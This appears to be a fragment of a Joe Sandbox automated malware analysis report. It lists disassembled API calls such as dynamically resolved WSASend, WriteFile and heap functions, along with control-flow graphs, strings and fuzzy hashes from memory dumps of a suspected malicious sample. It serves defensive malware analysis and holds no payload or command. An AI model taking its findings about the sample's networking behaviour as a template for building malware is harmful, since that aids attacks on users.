Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(Ws2_32.dll,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00C68127
• GetProcAddress.KERNEL32(00000000,?), ref: 00C68132
• WSASend.WS2_32(?,?,00000001,00000000,00000000,00000000,00000000), ref: 00C6814B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
Similarity
• API ID: AddressHandleModuleProcSend
• String ID: Ws2_32.dll
• API String ID: 2819740048-3093949381
• Opcode ID: 7937d3f15b9bc66801ba94555335b0bd421f25d9aa8e1d463b08ca2c5094ca0a
• Instruction ID: abb56d62c78772d56f36148425b7c7afe885736d978f4998d6ff091dd54a949e
• Opcode Fuzzy Hash: 7937d3f15b9bc66801ba94555335b0bd421f25d9aa8e1d463b08ca2c5094ca0a
• Instruction Fuzzy Hash: 38029E70A04241CFDB35CF68C890A6DBBB1FF45318F244A5DE4A29B792D731AD46CB91
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetSystemMetrics.USER32(00000001), ref: 00D5219F
• GetSystemMetrics.USER32(00000000), ref: 00D521A5
Strings
Memory Dump Source
• Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MetricsSystem
                                                                                                                                              • String ID: image/png
                                                                                                                                              • API String ID: 4116985748-2966254431
                                                                                                                                              • Opcode ID: 2b274f15b16152769453609b521c5217dffa43f88d68bf137586d5cde7a646cf
                                                                                                                                              • Instruction ID: 1b81ff8367dcc6e03e43a03d10a4e54be8f4587e459de6bc5ca6c3614b97c7b3
                                                                                                                                              • Opcode Fuzzy Hash: 2b274f15b16152769453609b521c5217dffa43f88d68bf137586d5cde7a646cf
                                                                                                                                              • Instruction Fuzzy Hash: FD51357190030AABEF109FA0DC49BEEBBB8EF19315F140029ED05B6261D7759A89CB74
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              control_flow_graph 1751 ca4019-ca403b 1752 ca422e 1751->1752 1753 ca4041-ca4043 1751->1753 1756 ca4230-ca4234 1752->1756 1754 ca406f-ca4092 1753->1754 1755 ca4045-ca4064 call c93473 1753->1755 1758 ca4098-ca409e 1754->1758 1759 ca4094-ca4096 1754->1759 1762 ca4067-ca406a 1755->1762 1758->1755 1761 ca40a0-ca40b1 1758->1761 1759->1758 1759->1761 1763 ca40b3-ca40b9 call c9cecd 1761->1763 1764 ca40c4-ca40d4 call ca3b5e 1761->1764 1762->1756 1768 ca40be-ca40c1 1763->1768 1769 ca411d-ca412f 1764->1769 1770 ca40d6-ca40dc 1764->1770 1768->1764 1773 ca4131-ca4137 1769->1773 1774 ca4186-ca41a6 WriteFile 1769->1774 1771 ca40de-ca40e1 1770->1771 1772 ca4105-ca411b call ca372f 1770->1772 1775 ca40ec-ca40fb call ca3af6 1771->1775 1776 ca40e3-ca40e6 1771->1776 1794 ca40fe-ca4100 1772->1794 1780 ca4139-ca413c 1773->1780 1781 ca4172-ca4184 call ca3bdb 1773->1781 1778 ca41a8-ca41ae GetLastError 1774->1778 1779 ca41b1 1774->1779 1775->1794 1776->1775 1782 ca41c6-ca41c9 1776->1782 1778->1779 1786 ca41b4-ca41bf 1779->1786 1787 ca415e-ca4170 call ca3d9f 1780->1787 1788 ca413e-ca4141 1780->1788 1801 ca4159-ca415c 1781->1801 1789 ca41cc-ca41ce 1782->1789 1795 ca4229-ca422c 1786->1795 1796 ca41c1-ca41c4 1786->1796 1787->1801 1788->1789 1790 ca4147-ca4154 call ca3cb6 1788->1790 1797 ca41fc-ca4208 1789->1797 1798 ca41d0-ca41d5 1789->1798 1790->1801 1794->1786 1795->1756 1796->1782 1804 ca420a-ca4210 1797->1804 1805 ca4212-ca4224 1797->1805 1802 ca41ee-ca41f7 call c9bf58 1798->1802 1803 ca41d7-ca41e9 1798->1803 1801->1794 1802->1762 1803->1762 1804->1752 1804->1805 1805->1762
                                                                                                                                              APIs
                                                                                                                                              • WriteFile.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,0000000C,?,00000000,00DD8C88,00000014,00C9BE32,00000000,00000000,00000000), ref: 00CA419E
                                                                                                                                              • GetLastError.KERNEL32(?,00000000), ref: 00CA41A8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorFileLastWrite
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 442123175-0
                                                                                                                                              • Opcode ID: c3dd90701bacb894f6f8daad923707f8eaf5332de94dfb1f77f5fa85f3e65d37
                                                                                                                                              • Instruction ID: 80e69657d6faa665b52012e43fed30cd62d6f819d3ad7f25d8cd09c8d3a69340
                                                                                                                                              • Opcode Fuzzy Hash: c3dd90701bacb894f6f8daad923707f8eaf5332de94dfb1f77f5fa85f3e65d37
                                                                                                                                              • Instruction Fuzzy Hash: 9C61E47190021BAFDF15DFA8DC84EEEBBB9AF8A308F140145F914A7251D7B2DA41DB60
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              control_flow_graph 1820 ca58aa-ca58b3 1821 ca58e2-ca58e3 1820->1821 1822 ca58b5-ca58c8 RtlFreeHeap 1820->1822 1822->1821 1823 ca58ca-ca58e1 GetLastError call c9bef2 call c9bf8f 1822->1823 1823->1821
                                                                                                                                              APIs
                                                                                                                                              • RtlFreeHeap.NTDLL(00000000,00000000,?,00CAC3D9,?,00000000,?,?,00CAC67A,?,00000007,?,?,00CACB6E,?,?), ref: 00CA58C0
                                                                                                                                              • GetLastError.KERNEL32(?,?,00CAC3D9,?,00000000,?,?,00CAC67A,?,00000007,?,?,00CACB6E,?,?), ref: 00CA58CB
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorFreeHeapLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 485612231-0
                                                                                                                                              • Opcode ID: d6455fd670f8d98d3cc94efd809d182981f9cb8de2440be050de0d33e431989f
                                                                                                                                              • Instruction ID: 4a0421971163a983797b0448e60d0307a506d8c1c9b8a0874f9f264d334f37f3
                                                                                                                                              • Opcode Fuzzy Hash: d6455fd670f8d98d3cc94efd809d182981f9cb8de2440be050de0d33e431989f
                                                                                                                                              • Instruction Fuzzy Hash: C0E086311407156BCB113FB4EC0DBA57BA8AB40355F508461FA0DCA1A0CB348D50EB94
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              control_flow_graph 1828 ca368f-ca36a3 call ca91ce 1831 ca36a9-ca36b1 1828->1831 1832 ca36a5-ca36a7 1828->1832 1834 ca36bc-ca36bf 1831->1834 1835 ca36b3-ca36ba 1831->1835 1833 ca36f7-ca3717 call ca913d 1832->1833 1843 ca3729 1833->1843 1844 ca3719-ca3727 call c9bf58 1833->1844 1838 ca36dd-ca36ed call ca91ce CloseHandle 1834->1838 1839 ca36c1-ca36c5 1834->1839 1835->1834 1837 ca36c7-ca36db call ca91ce * 2 1835->1837 1837->1832 1837->1838 1838->1832 1847 ca36ef-ca36f5 GetLastError 1838->1847 1839->1837 1839->1838 1849 ca372b-ca372e 1843->1849 1844->1849 1847->1833
                                                                                                                                              APIs
                                                                                                                                              • CloseHandle.KERNEL32(00000000,00000000,CF830579,?,00CA3576,00000000,CF830579,00DD8C68,0000000C,00CA3632,00C9790D,?), ref: 00CA36E5
                                                                                                                                              • GetLastError.KERNEL32(?,00CA3576,00000000,CF830579,00DD8C68,0000000C,00CA3632,00C9790D,?), ref: 00CA36EF
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseErrorHandleLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 918212764-0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • Concurrency::cancel_current_task.LIBCPMT ref: 00C854A7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Concurrency::cancel_current_task
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 118556049-0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • Concurrency::cancel_current_task.LIBCPMT ref: 00C71CA5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Concurrency::cancel_current_task
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 118556049-0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • Concurrency::cancel_current_task.LIBCPMT ref: 00C855BB
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Concurrency::cancel_current_task
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 118556049-0
                                                                                                                                              • Opcode ID: 48e7cfd51d487dde3dff31291a41ee8c902363bdd0f4e61194a6bec3fb0a5773
                                                                                                                                              • Instruction ID: cab4463cf3c8fe2375b08d02fc02be77fcc1170469f8a0776f0376f2faf3301c
                                                                                                                                              • Opcode Fuzzy Hash: 48e7cfd51d487dde3dff31291a41ee8c902363bdd0f4e61194a6bec3fb0a5773
                                                                                                                                              • Instruction Fuzzy Hash: 29313872B00404AFC714FE7CCD8987E7BAADB843587254269FC29CB345EA70EE0597A5
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00CA5924: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00CA5956
                                                                                                                                              • RtlReAllocateHeap.NTDLL(00000000,?,00C8BF90,00000000,0000000F,?,00C8BF90,?,?,?,?), ref: 00CA62E5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                              • Opcode ID: 70d2a336e02c1d075aac4927b2c0e56779d69398a18686a588b4838fc8699d16
                                                                                                                                              • Instruction ID: a2e96b2f6ffbd16af417d6d222f0ec05ea9d9f894b1928857ae18da1c8f9fe3e
                                                                                                                                              • Opcode Fuzzy Hash: 70d2a336e02c1d075aac4927b2c0e56779d69398a18686a588b4838fc8699d16
                                                                                                                                              • Instruction Fuzzy Hash: 77F0A432601617AA9B213A66AC05F7B3758DBC37BCF2D0226F825EA1D1DE20DD00A5A1
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • Concurrency::cancel_current_task.LIBCPMT ref: 00C6373F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Concurrency::cancel_current_task
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 118556049-0
                                                                                                                                              • Opcode ID: bf8bdb994f8b78c6ea1e93e862c5098b48677a1b32678d5e49d9988079045177
                                                                                                                                              • Instruction ID: ee770342e280487d405b46dfa04baeb0cfcef9cfae487351f4833742309dec38
                                                                                                                                              • Opcode Fuzzy Hash: bf8bdb994f8b78c6ea1e93e862c5098b48677a1b32678d5e49d9988079045177
                                                                                                                                              • Instruction Fuzzy Hash: 22F024F21400408BDB24AFA0D4864E9B3E8DF243A1310047AE99EC7142E726DF84A780
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • RtlAllocateHeap.NTDLL(00000008,00C8C58A,?), ref: 00CA4F2B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                              • Opcode ID: 564efa130697711f7db5934bb9f2006030801627399033d94a7dce9748fc6f4d
                                                                                                                                              • Instruction ID: c2f38550981f3842e4683312b5942836465dd37e1669540f81b2d0f74b26a5b1
                                                                                                                                              • Opcode Fuzzy Hash: 564efa130697711f7db5934bb9f2006030801627399033d94a7dce9748fc6f4d
                                                                                                                                              • Instruction Fuzzy Hash: D8F059316152236F9F282EA2AC01A6A378D9FC33A8F149012BC25E7180CAB0ED0096E0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00CA5956
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                              • Opcode ID: 7719b6b59376690bebf3a07172ffb3d85cf8099558e8b8b72eee4f9bc01de0dc
                                                                                                                                              • Instruction ID: 33a42f0df118753ca50db3fb627ca8eeb2fa9db8305ea450b4a4ea4e4886d02e
                                                                                                                                              • Opcode Fuzzy Hash: 7719b6b59376690bebf3a07172ffb3d85cf8099558e8b8b72eee4f9bc01de0dc
                                                                                                                                              • Instruction Fuzzy Hash: DBE0E531202B23DBDE212B755C04BAB76489B433B8F188111BC2AEE5D0DB20CD0292A0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetLastError.KERNEL32(00000000,?,00C9CEE6,00000000,00000000,00000000,00000002,00000000,?,00CA40BE,00000000,00000000,00000000,00000002,00000000,00000000), ref: 00C9CDF5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1452528299-0
                                                                                                                                              • Opcode ID: 40287283f9ee14000dd37b3b9e1a9d865295c6c4884dcbc540da9961a3db97fc
                                                                                                                                              • Instruction ID: d8f324ebce16f2708079f2084c2042550be69c808e44cb36b9173d0c4c6d654d
                                                                                                                                              • Opcode Fuzzy Hash: 40287283f9ee14000dd37b3b9e1a9d865295c6c4884dcbc540da9961a3db97fc
                                                                                                                                              • Instruction Fuzzy Hash: 3701DB3361465AAFCF05DF55DC49D9E3F29EB85320B240244F8159B2D0E671DE41DBA0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • ___std_exception_destroy.LIBVCRUNTIME ref: 00C81441
                                                                                                                                              • ___std_exception_destroy.LIBVCRUNTIME ref: 00C8145A
                                                                                                                                              • ___std_exception_destroy.LIBVCRUNTIME ref: 00C815C9
                                                                                                                                              • ___std_exception_destroy.LIBVCRUNTIME ref: 00C815E2
                                                                                                                                              • ___std_exception_destroy.LIBVCRUNTIME ref: 00C81771
                                                                                                                                              • ___std_exception_destroy.LIBVCRUNTIME ref: 00C8178A
                                                                                                                                              • ___std_exception_destroy.LIBVCRUNTIME ref: 00C818F8
                                                                                                                                              • ___std_exception_destroy.LIBVCRUNTIME ref: 00C81911
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ___std_exception_destroy
                                                                                                                                              • String ID: array$number overflow parsing '$object$value
                                                                                                                                              • API String ID: 4194217158-3322379575
                                                                                                                                              • Opcode ID: c29d32f3604d8aae298b911afad06073bdf43f30adfcad8367c5334fb20c0450
                                                                                                                                              • Instruction ID: 8a085db11c3fd057d2058d56ffdbf463d6c4ea453b67f8ee111be153641f8a6c
                                                                                                                                              • Opcode Fuzzy Hash: c29d32f3604d8aae298b911afad06073bdf43f30adfcad8367c5334fb20c0450
                                                                                                                                              • Instruction Fuzzy Hash: 0DA2D970D0025DDFDB14EFA4C884BEEBBB9BF45304F148299E805AB342D770AA85DB65
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1877489077.00000000011F4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877597301.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __floor_pentium4
                                                                                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                              • API String ID: 4168288129-2761157908
                                                                                                                                              • Opcode ID: de5706ddb9c62820704d84455ac3aec429d459f613738744720c6ee010884281
                                                                                                                                              • Instruction ID: c8a20e522dc5a1a7ebc143902ba225191a713f29e7140fa527ca98b9633914b0
                                                                                                                                              • Opcode Fuzzy Hash: de5706ddb9c62820704d84455ac3aec429d459f613738744720c6ee010884281
                                                                                                                                              • Instruction Fuzzy Hash: EFD24A71E082298FDB65CE68DC447EAB7B5FB45304F1441EAD81DE7240EB78AE868F41
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: header crc mismatch$incorrect header check$invalid window size$unknown compression method$unknown compression method$unknown header flags set
                                                                                                                                              • API String ID: 0-3686625691
                                                                                                                                              • Opcode ID: d50504cd1134d97a5f7d6b10bac8d24576fdb12be776ea34c28c28e9bb3183f5
                                                                                                                                              • Instruction ID: 363a7bf97cfc777045e6f6ebbd57dc4cc1f60cf16d77935513ca2fd11ce29257
                                                                                                                                              • Opcode Fuzzy Hash: d50504cd1134d97a5f7d6b10bac8d24576fdb12be776ea34c28c28e9bb3183f5
                                                                                                                                              • Instruction Fuzzy Hash: 14625DB1D002159FDF14CF99C5846AEBBF1AF48309F2881AADC54AB342D775D94ACFA0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 4/$_Ou$wcei
                                                                                                                                              • API String ID: 0-1318479226
                                                                                                                                              • Opcode ID: 40993f33fdc3f489caf4e29b3dbc193eddd959d572a812ab94d3648276f25fc7
                                                                                                                                              • Instruction ID: e10ae33064c2b7f5dd48b365d789eff3136dc99760aa2a3b7813cd6ecfc827d5
                                                                                                                                              • Opcode Fuzzy Hash: 40993f33fdc3f489caf4e29b3dbc193eddd959d572a812ab94d3648276f25fc7
                                                                                                                                              • Instruction Fuzzy Hash: 785116F391C214AFE7097A2CEC556BABBE5EB58360F1A492DE6C5C3740E935880086C6
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 8699a35763ac44eb22cce45b8889ca4ebfbbd05a2f808e76f48b50c83f6b4931
                                                                                                                                              • Instruction ID: 5b97809278036ba19458676d5c94a673012812e223a85f628a56f7b02568a74b
                                                                                                                                              • Opcode Fuzzy Hash: 8699a35763ac44eb22cce45b8889ca4ebfbbd05a2f808e76f48b50c83f6b4931
                                                                                                                                              • Instruction Fuzzy Hash: 3F025D71E152199BDF14CFA9C884AAEFBF1FF48314F258269E919E7341D731AA01CB90
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: %s|%s
                                                                                                                                              • API String ID: 0-3399301454
                                                                                                                                              • Opcode ID: 8f522317544b0c3a698221fa01359d4fd03c77655e1c4475f1f0f58957fcd485
                                                                                                                                              • Instruction ID: a04b23ac23070976d68d45dba18f5417f1c53a72e2c7d54446cc58e1ef9773c4
                                                                                                                                              • Opcode Fuzzy Hash: 8f522317544b0c3a698221fa01359d4fd03c77655e1c4475f1f0f58957fcd485
                                                                                                                                              • Instruction Fuzzy Hash: 8AC1AEB1D002099FDB14DFA8DC85BAEBBB5FF48310F144259E509AB391DB70A980DFA5
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetSystemTimePreciseAsFileTime.KERNEL32(?,00C8D907,?,?,?,?,00D327DF), ref: 00C8DEE5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Time$FilePreciseSystem
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1802150274-0
                                                                                                                                              • Opcode ID: ab65c07bdd8971068c7d9013e3980e93f52e89e70cdbbeedb073b0b6783e1620
                                                                                                                                              • Instruction ID: 2eec90e8873e0ecf6bb14083795e26f059eb7ad0c9ec705245862de3acfde14c
                                                                                                                                              • Opcode Fuzzy Hash: ab65c07bdd8971068c7d9013e3980e93f52e89e70cdbbeedb073b0b6783e1620
                                                                                                                                              • Instruction Fuzzy Hash: 94F03032908795EFCB11AF45DC41B69BBA8F708B54F00412AE812D7790DB756900CBA4
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: }S;
                                                                                                                                              • API String ID: 0-3652442933
                                                                                                                                              • Opcode ID: 6bb490c6832159a8a8c4be906628b909f909f215026e9780e7785efb48e30293
                                                                                                                                              • Instruction ID: 4f1bd1098cc30cd685465f981c8dc4a656ef345274ee0dcd6f01fbe2f4366f76
                                                                                                                                              • Opcode Fuzzy Hash: 6bb490c6832159a8a8c4be906628b909f909f215026e9780e7785efb48e30293
                                                                                                                                              • Instruction Fuzzy Hash: F751E3F3A0D204AFE714BE29EC8577AFBE5EFA4311F06852DE6C583744EA3514048656
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: @c]
                                                                                                                                              • API String ID: 0-1688712109
                                                                                                                                              • Opcode ID: 04ef10f40eeaae3c0927556888d932ab1cf9ac14d2059325cd6faad1915dabfd
                                                                                                                                              • Instruction ID: 7ca2bc17d0b491c101e51815ef276aff24863ec9c8e6f1c196ae252e28133ce5
                                                                                                                                              • Opcode Fuzzy Hash: 04ef10f40eeaae3c0927556888d932ab1cf9ac14d2059325cd6faad1915dabfd
                                                                                                                                              • Instruction Fuzzy Hash: 1F5193F2918614AFE304AF5DDC41A7AF7E9EF98710F16882DEAC9D3300E63558508B97
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: -{
                                                                                                                                              • API String ID: 0-667976471
                                                                                                                                              • Opcode ID: b63480f97982e7db8a7db3ed45ed25de528528b334b240bae28df31dbf5fed8a
                                                                                                                                              • Instruction ID: a7c293ff96229cf0fcfe4b88f1388a05779a5af3e39fcc7eef4c19b9a7be2adf
